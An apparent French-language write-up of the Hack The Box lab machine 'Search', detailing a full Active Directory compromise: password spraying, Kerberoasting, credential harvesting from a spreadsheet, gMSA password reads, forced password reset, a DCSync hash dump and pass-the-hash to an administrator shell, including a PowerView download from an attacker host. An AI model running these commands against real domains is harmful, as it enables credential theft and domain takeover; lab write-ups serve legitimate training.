- Info Card
- Port Scanning
- Web enumeration, information disclosure
- Generate custom wordlist + Password Spraying
- Kerberoasting
- Password re-use
- Sensitive Information Disclosure through excel binder
- Access on PSWA as Sierra.Frye with PFX file
- Crack PFX File
- Import certificate in Firefox
- BloodHound enumeration
- Read gMSA Password
- Create PS-Credential object with gMSA password
- Force change password with GenericAll rights
- DCSync attack
Info Card
Port Scanning
➤ nmap -T5 -sCV -p- 10.10.11.129 -Pn
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Search — Just Testing IIS
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-04-17 13:27:09Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
|_ssl-date: 2022-04-17T13:28:46+00:00; -1h43m08s from scanner time.
443/tcp open ssl/http Microsoft IIS httpd 10.0
| tls-alpn:
|_ http/1.1
|_http-title: Search — Just Testing IIS
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
|_ssl-date: 2022-04-17T13:28:46+00:00; -1h43m08s from scanner time.
|_http-server-header: Microsoft-IIS/10.0
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2022-04-17T13:28:47+00:00; -1h43m08s from scanner time.
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
|_ssl-date: 2022-04-17T13:28:46+00:00; -1h43m08s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
|_ssl-date: 2022-04-17T13:28:47+00:00; -1h43m08s from scanner time.
8172/tcp open ssl/http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| ssl-cert: Subject: commonName=WMSvc-SHA2-RESEARCH
| Not valid before: 2020-04-07T09:05:25
|_Not valid after: 2030-04-05T09:05:25
| tls-alpn:
|_ http/1.1
|_ssl-date: 2022-04-17T13:28:45+00:00; -1h43m08s from scanner time.
|_http-title: Site doesn't have a title.
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open tcpwrapped
49667/tcp open msrpc Microsoft Windows RPC
49675/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49676/tcp open msrpc Microsoft Windows RPC
49695/tcp open msrpc Microsoft Windows RPC
49696/tcp open tcpwrapped
49707/tcp open tcpwrapped
49710/tcp open msrpc Microsoft Windows RPC
49719/tcp open tcpwrapped
Service Info: Host: RESEARCH; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
|_clock-skew: mean: -1h43m08s, deviation: 0s, median: -1h43m08s
| smb2-time:
| date: 2022-04-17T13:28:09
|_ start_date: N/A
Web enumeration, information disclosure
Nous pouvons énumérer les fichiers/répertoires
sur le serveur web
Il y a un /staff
mais malheureusement nous n’y avons pas accès.
Il y’a une image avec des inscriptions sur le serveur web
Regardons de plus près /images/slide_2.jpg
Le mot de passe de Hope Sharp
est divulgé: IsolationIsKey?
Sauf que bien évidemment le nom d’utilisateur n’est pas ‘Hope Sharp’
➤ cme ldap 10.10.11.129 -d search.htb -u 'Hope Sharp' -p 'IsolationIsKey?'
SMB 10.10.11.129 445 RESEARCH [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Hope Sharp:IsolationIsKey?
Generate custom wordlist + Password Spraying
Nous pouvons tester de générer une custom liste d’utilisateurs à partir de Hope Sharp
cat -p -n user.lst
1 Hope Sharp
2 Sharp Hope
3 HopeSharp
4 HopeSharp2021
5 HopeSharp2022
6 h.sharp
7 sharp.h
8 hope
9 sharp
10 Hope
11 Sharp
12 hope.s
13 Hope.Sharp
14 hope.sharp
15 h.Sharp
16 Hope.S
Essayons de password spray avec cette liste d’utilisateur générée à la main:
➤ cme ldap 10.10.11.129 -d search.htb -u user.lst -p 'IsolationIsKey?' --continue-on-success
SMB 10.10.11.129 445 RESEARCH [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Hope Sharp:IsolationIsKey?
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Sharp Hope:IsolationIsKey?
SMB 10.10.11.129 445 RESEARCH [-] search.htb\HopeSharp:IsolationIsKey?
SMB 10.10.11.129 445 RESEARCH [-] search.htb\HopeSharp2021:IsolationIsKey?
SMB 10.10.11.129 445 RESEARCH [-] search.htb\HopeSharp2022:IsolationIsKey?
SMB 10.10.11.129 445 RESEARCH [-] search.htb\h.sharp:IsolationIsKey?
SMB 10.10.11.129 445 RESEARCH [-] search.htb\sharp.h:IsolationIsKey?
SMB 10.10.11.129 445 RESEARCH [-] search.htb\hope:IsolationIsKey?
SMB 10.10.11.129 445 RESEARCH [-] search.htb\sharp:IsolationIsKey?
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Hope:IsolationIsKey?
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Sharp:IsolationIsKey?
SMB 10.10.11.129 445 RESEARCH [-] search.htb\hope.s:IsolationIsKey?
LDAP 10.10.11.129 389 RESEARCH [+] search.htb\Hope.Sharp:IsolationIsKey?
LDAP 10.10.11.129 389 RESEARCH [+] search.htb\hope.sharp:IsolationIsKey?
LDAP 10.10.11.129 389 RESEARCH [-] search.htb\h.Sharp:IsolationIsKey?
LDAP 10.10.11.129 389 RESEARCH [-] search.htb\Hope.S:IsolationIsKey?
LDAP 10.10.11.129 389 RESEARCH [-] search.htb\:IsolationIsKey?
Nous avons compromis un compte de domaine: search.htb\Hope.Sharp:IsolationIsKey?
On peu désormais tenter plusieur types d’attaques
Kerberoasting
➤ net time -S 10.10.11.129
Sun Apr 17 13:53:08 2022
➤ faketime '2022-04-17 13:55:00' cme ldap 10.10.11.129 -d search.htb -u Hope.Sharp -p 'IsolationIsKey?' --kerberoast krb5-tgs.txt
SMB 10.10.11.129 445 RESEARCH [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.129 389 RESEARCH [+] search.htb\Hope.Sharp:IsolationIsKey?
LDAP 10.10.11.129 389 RESEARCH [*] Total of records returned 4
LDAP 10.10.11.129 389 RESEARCH sAMAccountName: web_svc memberOf: pwdLastSet: 2020-04-09 12:59:11.329031 lastLogon:<never>
LDAP 10.10.11.129 389 RESEARCH $krb5tgs$23$*web_svc$SEARCH.HTB$RESEARCH/web_svc.search.htb~60001*$4c1cf7c79f35e86aa4cd7a7ae496fa27$4279de8172dec881fa90a3b2fd733e3533f1f7fca5dbfd70be34b6d4ee3a0c7b817111ac36b1c6af1617785d4281448fe89ac66e66e2fdcb5ddacf84e5b0af93c0110b5a7b0bde9f77ffa28216ea6c08a1c00b24d57d307483a0c69f85fff93c9614715a2bb4d0307f8dba99f8c6734e27f325955908d7e61e28f3658cc481c9f044d79aff1368ce75e6416b619bae4d48ce1ffb1dac8d23019667fc9d3c130e0298cf7b2b8079d4413738611b4d112567fb10336705ab0aa3dec0a81aeee9b30fcbe72f8b90d5f20726de69ff2627de9010a0e79b9f48d1287594cba2f7bb851b04904673ab2b50d40e3dd3cf0ed96f75c01e8ac2706fdc15f19aa8177a9b5b4a118f76430186f31b75f90b427a8becbbd7fcc44ed827570d51fc175ddbd1ff94234cde2a477cd93c11154a04fe07eed53b5010245a28c36f9aec14bf4f2509e878a901f90aaf01b45dbb3130c30dadeb9122a85c4113ae32f34934cb01cc7b0468d8bde0d94b074e95c489520f7909b23c22b70b6bd767c7b40e98efe6b22cf4f5c5ebe5bdfd7f79b1250afbf1053284db05e9ec81b99400c5420a059afbfbf303747825fb4ec7a85aa902c2e874af9bfdfaf4c9a8520684c4242c3d2845dc9180faf0e86b371e36da67949f6eac58c7bfb37720090eaabfc48dd54126b9a581766d965af19fee5ba7bb6b79ff276ec99389de5b4c698d85e427f956b885e300a2982caffc9efa02d6309bc2e6f1d0e347ee6ab449e328c40ff6285e660961c56ba39b527297f80e9fcbc50d4d6ce379c0b4ffe4b60b38cf92bd061729eff9c3bad38399e27a0dd8e7873346d6f55da260fb40d465fbd0706343a513d71f452f86f7b66bfbf92ec0129f462dd5bf1bc36242ac5f8ae1c4bdd808cf79c51567c35ddb53fe822c0bdd1904707f8efe4a619f4adf544850da3121573cf1a8d399b8dc730ced15a10238205ebe5491662376c2ca434555eedb5f4e6164d32d6fff67c002ed138e759015a1b0467fc41baa5d85b681e6d1641e74fc2dba238265554bf639dd47be5b18bde0e96c1ef0a96d37a99e69a166f81b599749ec518c08f787f78e6f37577b373297c85668098050bcd8abdb1d81d8c34815abd6750f2ecf55e9d0fb0fd11c3c9dd8ae47e831fd07479a89ed0418c70a48103cffbea651cc26ea6a4c4c11253d7159061a9b6839b0d0a21e0da3c710907f207489d98c32682897f5974d6cfddf5801652c411b98c2aeeba0fae1f730774afb03247527556637e367edf0dd3980d456ac4905e96bfc10634bcfaf4c2e4c95dc6e7c2e9d171835e58742b2db6b3fc86dafbfa017680f5e3b4d038fa74ddbcbdbcaee424039b476970e4634f6df5674df15b25930ab48257217b01f1a4817c53ec64a1ad45c40f5d15988c62025a5d8b80f3fc759dca5681abcdd75f3dfec011aff69d570d619cdab7409d907836038cb89f66176bbb00d7097a0ae
Nous récupérons le tgs
de web_svc
qui est un compte de service, nous pouvons tenter de crack le hash.
➤ john krb5-tgs.txt --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --format=krb5tgs
àUsing default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:01 0,02% (ETA: 17:18:12) 0g/s 0p/s 0c/s 0C/s
@3ONEmillionbaby (?)
1g 0:00:00:11 DONE (2022-04-17 15:41) 0.09033g/s 1038Kp/s 1038Kc/s 1038KC/s @4208891ncv..=123jacko
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Cela à fonctionner avec succès nous récupérons le mot de passe du compte de service: web_svc:@3ONEmillionbaby
➤ cme ldap 10.10.11.129 -d search.htb -u 'web_svc' -p '@3ONEmillionbaby'
SMB 10.10.11.129 445 RESEARCH [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.129 389 RESEARCH [+] search.htb\web_svc:@3ONEmillionbaby
La target semble vulnérable à ms16-068
, mais cela ne sera pas utile car le ticket recu n’est pas intéréssant pour web_svc
, car aucun service n’est à sa disposition.
faketime '2022-04-17 15:50:00' goldenPac.py -dc-ip 10.10.11.129 search.htb/web_svc:'@3ONEmillionbaby'@RESEARCH.SEARCH.HTB
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] User SID: S-1-5-21-271492789-1610487937-1871574529-1296
[*] Forest SID: S-1-5-21-271492789-1610487937-1871574529
[*] Attacking domain controller 10.10.11.129
[*] 10.10.11.129 found vulnerable!
Password re-use
Avec les utilisateurs récupéré sur le smb nous sommes en mesure d’appronfondire notre énumération
cat -p users.lst
abril.suarez
Angie.Duffy
Antony.Russo
belen.compton
Cameron.Melendez
chanel.bell
Claudia.Pugh
Cortez.Hickman
dax.santiago
Eddie.Stevens
edgar.jacobs
Edith.Walls
eve.galvan
frederick.cuevas
hope.sharp
jayla.roberts
Jordan.Gregory
payton.harmon
Reginald.Morton
santino.benjamin
Savanah.Velazquez
sierra.frye
trace.ryan
On peu chercher des utilisateurs faisant du password reuse
➤ cme ldap 10.10.11.129 -d search.htb -u users.lst -p '@3ONEmillionbaby'
SMB 10.10.11.129 445 RESEARCH [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.129 445 RESEARCH [-] search.htb\abril.suarez:@3ONEmillionbaby
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Angie.Duffy:@3ONEmillionbaby
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Antony.Russo:@3ONEmillionbaby
SMB 10.10.11.129 445 RESEARCH [-] search.htb\belen.compton:@3ONEmillionbaby
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Cameron.Melendez:@3ONEmillionbaby
SMB 10.10.11.129 445 RESEARCH [-] search.htb\chanel.bell:@3ONEmillionbaby
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Claudia.Pugh:@3ONEmillionbaby
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Cortez.Hickman:@3ONEmillionbaby
SMB 10.10.11.129 445 RESEARCH [-] search.htb\dax.santiago:@3ONEmillionbaby
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Eddie.Stevens:@3ONEmillionbaby
LDAP 10.10.11.129 389 RESEARCH [+] search.htb\edgar.jacobs:@3ONEmillionbaby
edgar.jacobs
à le même mot de passe que web_svc
➤ cme smb 10.10.11.129 -d search.htb -u edgar.jacobs -p '@3ONEmillionbaby' --shares
SMB 10.10.11.129 445 RESEARCH [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.129 445 RESEARCH [+] search.htb\edgar.jacobs:@3ONEmillionbaby
SMB 10.10.11.129 445 RESEARCH [+] Enumerated shares
SMB 10.10.11.129 445 RESEARCH Share Permissions Remark
SMB 10.10.11.129 445 RESEARCH ----- ----------- ------
SMB 10.10.11.129 445 RESEARCH ADMIN$ Remote Admin
SMB 10.10.11.129 445 RESEARCH C$ Default share
SMB 10.10.11.129 445 RESEARCH CertEnroll READ Active Directory Certificate Services share
SMB 10.10.11.129 445 RESEARCH helpdesk READ
SMB 10.10.11.129 445 RESEARCH IPC$ READ Remote IPC
SMB 10.10.11.129 445 RESEARCH NETLOGON READ Logon server share
SMB 10.10.11.129 445 RESEARCH RedirectedFolders$ READ,WRITE
SMB 10.10.11.129 445 RESEARCH SYSVOL READ Logon server share
On peu se connecter sur le smb avec ses credentials et aller voir son répertoire courant
➤ smbclient.py htb.local/'edgar.jacobs':'@3ONEmillionbaby'@search.htb
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
Type help for list of commands
# use RedirectedFolders$
# cd edgar.jacobs
# ls
drw-rw-rw- 0 Thu Apr 9 20:04:11 2020 .
drw-rw-rw- 0 Thu Apr 9 20:04:11 2020 ..
drw-rw-rw- 0 Mon Aug 10 10:02:16 2020 Desktop
drw-rw-rw- 0 Mon Aug 10 10:02:17 2020 Documents
drw-rw-rw- 0 Mon Aug 10 10:02:17 2020 Downloads
# cd Desktop
# ls
drw-rw-rw- 0 Mon Aug 10 10:02:16 2020 .
drw-rw-rw- 0 Mon Aug 10 10:02:16 2020 ..
drw-rw-rw- 0 Thu Apr 9 20:05:29 2020 $RECYCLE.BIN
-rw-rw-rw- 282 Mon Aug 10 10:02:16 2020 desktop.ini
-rw-rw-rw- 1450 Thu Apr 9 20:05:03 2020 Microsoft Edge.lnk
-rw-rw-rw- 23130 Mon Aug 10 10:30:05 2020 Phishing_Attempt.xlsx
# mget Phishing_Attempt.xlsx
Sensitive Information Disclosure through excel binder
Il y’a un fichier Phishing_Attempt.xlsx
qui n’est rien d’autre qu’un classeur Excel
. On pourra l’ouvrir avec LibreOffice
.
C’est un fichier qui décrit les statistiques par rapport au nombre de mots de passe capturé
par année via les attaques phishing
, il y’a une autre page que nous pouvons regarder.
Il y’a des informations à propos d’autres utilisateurs. Quand j’éssaye de bouger la taille des cellules
pour voir si il n’y a pas d’informations cachés je me fait bloquer car elle sont protégées
Nous pouvons tout selectioner en cliquant sur le petit carré en haut à gauche
Plus qu’a copié
+ coller sans formatage
pour voir si on arrive a trouver d’autre informations
firstname lastname password Username
Payton Harmon ;;36!cried!INDIA!year!50;; Payton.Harmon
Cortez Hickman ..10-time-TALK-proud-66.. Cortez.Hickman
Bobby Wolf ??47^before^WORLD^surprise^91?? Bobby.Wolf
Margaret Robinson //51+mountain+DEAR+noise+83// Margaret.Robinson
Scarlett Parks ++47|building|WARSAW|gave|60++ Scarlett.Parks
Eliezer Jordan !!05_goes_SEVEN_offer_83!! Eliezer.Jordan
Hunter Kirby ~~27%when%VILLAGE%full%00~~ Hunter.Kirby
Sierra Frye $$49=wide=STRAIGHT=jordan=28$$18 Sierra.Frye
Annabelle Wells ==95~pass~QUIET~austria~77== Annabelle.Wells
Eve Galvan //61!banker!FANCY!measure!25// Eve.Galvan
Jeramiah Fritz ??40:student:MAYOR:been:66?? Jeramiah.Fritz
Abby Gonzalez &&75:major:RADIO:state:93&& Abby.Gonzalez
Joy Costa **30*venus*BALL*office*42** Joy.Costa
Vincent Sutton **24&moment&BRAZIL&members&66** Vincent.Sutton
Ce qui est le cas, nous sommes en mesure de voir leurs mots de passe.
Nous pouvons tenter de spray
, pour voir si les mots de passes
sont bien valides.
➤ cme ldap 10.10.11.129 -d search.htb -u offuser.lst -p offpass.txt --continue-on-success --no-bruteforce
SMB 10.10.11.129 445 RESEARCH [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Payton.Harmon:;;36!cried!INDIA!year!50;;
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Cortez.Hickman:..10-time-TALK-proud-66..
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Bobby.Wolf:??47^before^WORLD^surprise^91??
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Margaret.Robinson://51+mountain+DEAR+noise+83//
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Scarlett.Parks:++47|building|WARSAW|gave|60++
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Eliezer.Jordan:!!05_goes_SEVEN_offer_83!!
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Hunter.Kirby:~~27%when%VILLAGE%full%00~~
LDAP 10.10.11.129 389 RESEARCH [+] search.htb\Sierra.Frye:$$49=wide=STRAIGHT=jordan=28$$18
LDAP 10.10.11.129 389 RESEARCH [-] search.htb\Annabelle.Wells:==95~pass~QUIET~austria~77==
LDAP 10.10.11.129 389 RESEARCH [-] search.htb\Eve.Galvan://61!banker!FANCY!measure!25//
LDAP 10.10.11.129 389 RESEARCH [-] search.htb\Jeramiah.Fritz:??40:student:MAYOR:been:66??
LDAP 10.10.11.129 389 RESEARCH [-] search.htb\Abby.Gonzalez:&&75:major:RADIO:state:93&&
LDAP 10.10.11.129 389 RESEARCH [-] search.htb\Joy.Costa:**30*venus*BALL*office*42**
LDAP 10.10.11.129 389 RESEARCH [-] search.htb\Vincent.Sutton:**24&moment&BRAZIL&members&66**
Nous avons pwn l’utilisateur Sierra.Frye:$$49=wide=STRAIGHT=jordan=28$$18
Access on PSWA as Sierra.Frye with PFX file
Nous pouvons accéder aux shares avec et récupérer le user flag
smbclient.py htb.local/'Sierra.Frye':'$$49=wide=STRAIGHT=jordan=28$$18'@search.htb
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
Type help for list of commands
# use RedirectedFolders$
# mget user.txt
[*] Downloading user.txt
Dans le répertoire de Sierre.Frye
nous pouvons récupérer un fichier pfx
qui va nous servir pour accéder au PSWA
(PowerShell Web Access) sur /staff
smb: \sierra.frye\Downloads\Backups\> ls
. DHc 0 Mon Aug 10 20:39:17 2020
.. DHc 0 Mon Aug 10 20:39:17 2020
search-RESEARCH-CA.p12 Ac 2643 Fri Jul 31 15:04:11 2020
staff.pfx Ac 4326 Mon Aug 10 20:39:17 2020
smb: \sierra.frye\Downloads\Backups\> mget staff.pfx
Pour cela nous allons inclure le PFX file
dans firefox en tant que certificat
Crack PFX File
Mais tout d’abord nous avons besoin du mot de passe d’importation du fichier au format PKCS#12
. Pour cela je vais utiliser crackpkcs12
, pour tenter de le crack
.
➤ crackpkcs12 -d $(locate rockyou.txt| tail -n1) staff.pfx
Dictionary attack - Starting 12 threads
*********************************************************
Dictionary attack - Thread 1 - Password found: misspissy
*********************************************************
Import certificate in Firefox
Super ! Nous pouvons importer le fichier pfx
sur Firefox pour l’utiliser en tant que certificat:
Nous pouvons accéder au /staff
via le certificat, désormais nous avons la possibilité de nous connecter avec les creds de Sierra.Frye
sur le PSWA
BloodHound enumeration
Nous pouvons faire un bloohdhound
avec les creds de Sierra
:
bloodhound-python -u 'Sierra.Frye' -p '$$49=wide=STRAIGHT=jordan=28$$18' -d search.htb -v --zip -c All,Loggedon -dc search.htb -ns 10.10.11.129
L’utilisateur qu’on a compromis (Sierra.Frye) est membre du groupe BIRMINGHAM-ITSEC
, ce dernier est membre du groupe ITSEC
.
ITSEC
a la permissions de ReadGMSAPassword
sur l’objet BIR-ADFS-GMSA
.
BIR-ADFS-GMSA
a les droits GenericAll
sur l’utilisateur Tristan.Davies
.
Tristan.Davies
étant Domain Admins
.
Read gMSA Password
Nous pouvons utiliser le tool gMSADumper
pour obtenir le hash nt
de BIR-ADFS-GMSA$
➤ python3 gMSADumper.py -u 'Sierra.Frye' -p '$$49=wide=STRAIGHT=jordan=28$$18' -d 'search.htb'
Users or groups who can read password for BIR-ADFS-GMSA$:
> ITSec
BIR-ADFS-GMSA$:::e1e9fd9e46d0d747e1595167eedcec0f
Create PS-Credential object with gMSA password
$gmsa = Get-ADServiceAccount -Identity BIR-ADFS-GMSA -properties msds-ManagedPassword # Read LDAP attribute
$mp = $gmsa.'msDS-ManagedPassword' # Read gMSA Password
$securestring = ConvertFrom-ADManagedPasswordBlob $mp # Convert password Blob to Secure String
$cred = New-Object System.Management.Automation.PSCredential('SEARCH\BIR-ADFS-GMSA', $securestring.SecureCurrentPassword) # Create PS-Credential object
Force change password with GenericAll rights
Invoke-WebRequest -Uri "http://10.10.14.11/PowerView-ofs.ps1" -OutFile "C:\Users\Sierra.Frye\Documents\PowerView-ofs.ps1"
ipmo .\PowerView-ofs.ps1
$UserPassword = ConvertTo-SecureString 'Ilove4!' -AsPlainText -Force
Set-DomainUserPassword -Identity Tristan.Davies -AccountPassword $UserPassword -Credential $cred
DCSync attack
➤ secretsdump.py 'Tristan.Davies':'Ilove4!'@search.htb
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x697a8e5d7f1607bd69d577ff42336dd5
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9c7bf72260e8eef29e9cfeb60f94fc56:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
...
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5e3c0abbe0b4163c5612afe25c69ced6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:cd69d23e4383daa5b0f42d29dba9529a:::
➤ wmiexec.py search.htb/'Administrator'@10.10.11.129 -hashes ':5e3c0abbe0b4163c5612afe25c69ced6'
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
search\administrator